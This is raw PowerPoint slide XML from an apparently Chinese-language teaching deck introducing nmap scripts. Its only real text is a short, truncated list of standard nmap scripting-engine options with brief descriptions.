              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="721360"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="721360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="506730"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>nmap脚本基本命令和参数。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>namp脚本介绍</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1495425" y="3223895"/>
            <a:ext cx="9527540" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.nmap脚本扫描参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-sC			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>相当于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>--script=default- -script		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&lt;Lua scripts&gt;是一个逗号分隔的列表目录、脚本文件或脚本目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- -script-args		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>给NSE脚本提供参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- -script-args-file	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从文件中提取NSE脚本参数到脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- -script-trace		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示所有发送和接收的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- -script-updatedb	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>更新脚本数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- -script-help		</a:t>
            </a:r>
            <a:r>
